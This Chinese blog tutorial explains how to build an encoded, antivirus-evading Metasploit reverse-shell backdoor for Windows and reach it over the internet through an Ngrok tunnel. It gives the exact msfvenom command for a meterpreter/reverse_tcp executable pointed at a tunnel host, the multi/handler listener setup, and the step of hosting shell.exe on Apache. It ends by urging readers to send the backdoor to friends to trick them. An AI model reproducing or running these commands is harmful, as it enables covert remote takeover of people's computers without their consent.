渗透测试(二)-Metasploit生成免杀后门(外网篇)

已于 2024-06-19 22:21:28 修改
阅读量1.2k 收藏 38
点赞数 1
分类专栏: msf web渗透 测试 文章标签: web 渗透测试 测试工程师 网络安全 kali linux
于 2021-05-25 16:43:08 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42052733/article/details/117259301
版权
测试 同时被 3 个专栏收录
3 篇文章 0 订阅
订阅专栏
msf
2 篇文章 1 订阅
订阅专栏
web渗透
2 篇文章 0 订阅
订阅专栏

1. Sunny-Ngrok 开通隧道

  1. 首先在官网注册会员
  2. 登陆
  3. 选择要开通的服务器
  4. 这里我们选择美国Ngrok免费服务器

 选择tcp协议,填一个可以使用的端口号。

 开通隧道后可以在 隧道管理 中看到自己的隧道信息:

记住这里的 隧道id赠送域名 以及 隧道端口,下面会用到。

2. 启动隧道

首先在kali linux中下载对应的客户端,选择Linux 64位版本。

启动隧道:

./sunny clientid 隧道id

启动多个隧道:

./sunny clientid 隧道id,隧道id

要想后台运行可以使用 setsid 命令:

setsid ./sunny clientid 隧道id &

隧道连接成功后会显示:

3. 生成后门

sudo su
msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=free.idcfengye.com LPORT=10716 -b "\x00" -e x86/shikata_ga_nai -i 10 -f exe -o /var/www/html/shell.exe

这里和内网渗透的区别就是:将LHOST换成隧道的域名地址,将LPORT换成隧道端口。

如果想要在软件中绑定后门,按照 渗透测试(一)-Metasploit生成免杀后门(内网篇) 文中第7步就行,注意修改LHOST和LPORT

4. 监听

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 10716
run

5. 下载后门

同样打开apache服务,下载后门,然后就可以发给你的小伙伴们去坑他们了!

阿航的博客
关注
  • 1
    点赞
  • 38
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 4
    评论
专栏目录
Metasploit渗透测试指南完整版-pdf
07-23
本电子书讲带你打开一扇新的大门,让你掌握神器msf的使用!!!!! Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。仿佛一夜之间,任何人都可以成为黑客,每个人都可以使用攻击工具来攻击那些未打过补丁或者刚刚打过补丁的漏洞。软件厂商再也不能推迟发布针对已公布漏洞的补丁了,这是因为Metasploit团队一直都在努力开发各种攻击工具,并将它们贡献给所有Metasploit用户。 Metasploit的设计初衷是打造成一个攻击工具开发平台,本书稍后将讲解如何开发攻击工具。然而在目前情况下,安全专家以及业余安全爱好者更多地将其当作一种点几下鼠标就可以利用其中附带的攻击工具进行成功攻击的环境。
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版,是Metasploit框架渗透测试入门畅销近十年的口碑好书!!PDF扫描版,有详细书签!
第10章-Metasploit渗透测试之制作隐藏后门-v7.pdf
08-08
第10章-Metasploit渗透测试之制作隐藏后门-v7 本课程设计目的只用于教学,切勿使用课程中的技术进行违法活 动,学员利用课程中的造成的技术后果与讲师本人无关,倡导维护网络安 全人人有责,共同维护网络文明和谐。
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf 渗透测试-认识Metesploit2.pdf 渗透测试1.pdf
Kali使用Metasploit内、外网渗透windows系统
热门推荐
QQ670663的博客
02-17 2万+
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被永久性地改变了。 一、(内网渗透)内网英文缩写WAN;内网又称局域网 局域网的覆盖范围一般是方圆几千米之内,其具备的安装便捷、成本节约、扩展方便等特点使其在各类办公室内运用广泛。局域网可以实现文件管理、应用软件共享、打印机共享等功能,在使用过程当中,通过维护局域网网...
Metasploit外网渗透测试
Cheng_Yg的博客
07-25 262
作为一个强大的渗透框架,深受脚本小子们喜爱,但对于刚入坑的小白似乎不太友好,经常因为无法渗透外网而感到头疼,生成后门木马之后却只能在内网使用,本文采用cpolar内网穿透进行演示,对外网Android设备进行渗透测试
渗透测试神器之metasploit
weixin_52180702的博客
07-18 2376
metasploit 永恒之蓝漏洞复现
Metasploit——后渗透测试阶段
m0_62063669的博客
08-14 2120
伪造一个AP,诱使别人来连这个AP,别人连了这个AP访问Internet上其他网站服务器的时候,因为流量经过这个AP,就可以在这个AP上嗅探抓包,因为有msf,可以在AP上启动一些漏洞利用模块,然后目标的流量经过AP,一旦发现目标浏览器有漏洞,通过流量分析可以判断浏览器版本是否有漏洞,尝试往流量里注入漏洞利用代码(插入到返回的流量中),一旦返回流量中 收到后有漏洞利用代码,恰好浏览器有对应漏洞,那么代码就会执行,创建新的meterpreter shell。所以设置为LHOST设置为win7的IP。.....
白帽黑客之Metasploit
10-25
本套教程,我们将为大家详细讲解Metasploit的使用方法。Metasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。 
metasploit渗透测试笔记(内网渗透)
baidu_22850205的专栏
11-02 962
0x01 reverse the shell File 通常做法是使用msfpayload生成一个backdoor.exe然后上传到目标机器执行。本地监听即可获得meterpreter shell。 reverse_tcp/http/https => exe => victim => shell reverse_tcp windows: msfpayload wi
MSF(Metasploit)渗透测试---黑客工具使用指南
kuokay的博客
06-07 6255
渗透测试者的困扰:在众多相同类型的工具,丌知道如何选择。认为需要掌插数百个工具软件,上千个命令参数,实在记丌住。新出现的漏洞 POC/EXP 有丌同的运行环境要求,准备工作繁琐。大部分时间都在学习丌同工具的使用习惯,如果能统一就好了,迚而 Metasploit 就产生了。POC,全称”Proof of Concept”,中文“概念验证”,常挃一段漏洞证明的代码。EXP,全称”Exploit”,中文“利用”,挃利用系统漏洞迚行攻击的劢作。 Metasploit 框架是可以添加漏洞代码片段,就好比一个军火库,
网络安全人员一定要知道的Metasploit渗透框架!
weixin_46622350的博客
07-31 1840
简介 Metasploit是一款开源安全漏洞检测工具,附带数百个已知的软件漏洞,并保持频繁更新。被安全社区冠以“可以黑掉整个宇宙”之名的强大渗透测试框架。 Metasploit官网:https://www.metasploit.com/ Metasploit的Github仓库地址:https://github.com/rapid7/metasploit-framework 框架和相关术语简介: Vulnerability:允许攻击者入侵或危害系统安全性的弱点称为漏洞,漏洞可能存在于操作系统,应用软件甚至网
作为内网杀手的metasploit如何在外网使用呢?
qq284489030的博客
05-09 5149
经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢? 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧! 经常使用metsploit的同学可能会有疑问,为啥我只能在同一局域网里面进行渗透主机呢?…… 这主要是因为你的身处于内网之中。不知道大家对内网和外网的理解是什么?这里我给大家普及一下吧! 什么是内网?内网接入方...
kalimetasploit渗透测试工具使用教程
Kris__zhang的博客
06-23 8591
metasploit概述 是一款开源的安全漏洞检测工具,它可以帮助网络安全和IT专业人士识别安全性问题,验证漏洞的解决措施,从而完成对目标的安全性评估 该工具包括了 智能开发,代码审计,web应用程序扫描和社会工程等各项功能 什么是metasploit 可以用来发现漏洞,利用漏洞,提交漏洞,并实施攻击,用户可以从其他 漏洞扫描程序导入数据,基于漏洞主机的详细信息来发现可攻击漏洞 模块按照不同用途可分为7中类型,分别是Exploits(渗透攻击模块),Auxiliary(辅助模块),Post(后渗透攻击模块
后门攻击——Metasploit的使用
m0_57069925的博客
06-15 1858
此文章可以学习通过kali中的Metasploit生成后门程序,控制Windows系统的技巧,切勿用于真实环境,仅用于学习,若产生一切后果,由产生者负责一.简介后门攻击是一种新兴的针对深度学习模型的攻击方式,攻击者在模型的训练过程中通过某种方式对模型植入一些后门。当后门未被激发时,被攻击的模型具有和正常模型类似的表现;而当模型中埋藏的后门被攻击者激活时,模型的输出变为攻击者预先指定的标签以达到恶意的目的。简单的说明msfvenom是生成木马的,而msfconsole是监听的.攻击演示攻击者:kali 20
超牛叉的外网渗透详细教程
cheyunhua的博客
03-22 6122
文章来源 简书 https://mp.weixin.qq.com/s/oGUDJxPOfCz2CW-mCeeAlQ(原文) 众所周知,Metasploit 是个内网渗透神器。 但是内网渗透哪有外网刺激,于是笔者上度娘搜索“msf 外网”。 搜索结果的话, 首先,虚拟机里的kali不能渗透到外网的原因是它没有外网IP。 所以大多数都是用内网穿透工具,还有一部分是通过服务器做个frp代理。 本质其实都一样。但是亲测后者比较有用。 可!是! 第个方法有一个特点,就是很烦。 买好服务器之后再下载frp,服务器
metasploit后渗透入门--meterpreter
Yale的博客
01-14 3211
0x01利用漏洞拿到Meterpreter。 将存放在桌面上的exploit文件复制到metasploit系统指定的exploits存储路径中,并将exploit的属性设置为644. cp ~/Desktop/ms14_064_ole_exploit.rb /usr/share/metasploit-framework/modules/exploits/windows/browser/ chmod...
内网中使用metasploit进行渗透测试
chengfangang的专栏
09-04 4640
渗透测试时,metasploit往往作为后渗透工具。而大多数站点都内网ip。而本屌丝自己的机器也是内网ip,那么两个内网ip怎么建立连接? 以前总是使用lcx做端口转发连接站点的3389,是否也可以用lcx将metasploit和站点两个内网ip进行连接?发现是可行的。具体操作步骤如下: 网络环境: 由于物理机+虚拟机搭建环境所以如下模拟: mac的网络环境如下 T
metasploit渗透测试
最新发布
08-02
Metasploit是一个渗透测试工具,也是信息安全与渗透测试领域最大的开源项目之一。它可以帮助您查找、利用和验证漏洞,并附带了数百个已知软件漏洞的专业级漏洞攻击工具。Metasploit的设计初衷是打造成一个攻击工具...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 4
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

阿航的博客

我比你有钱,请不要打赏!

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值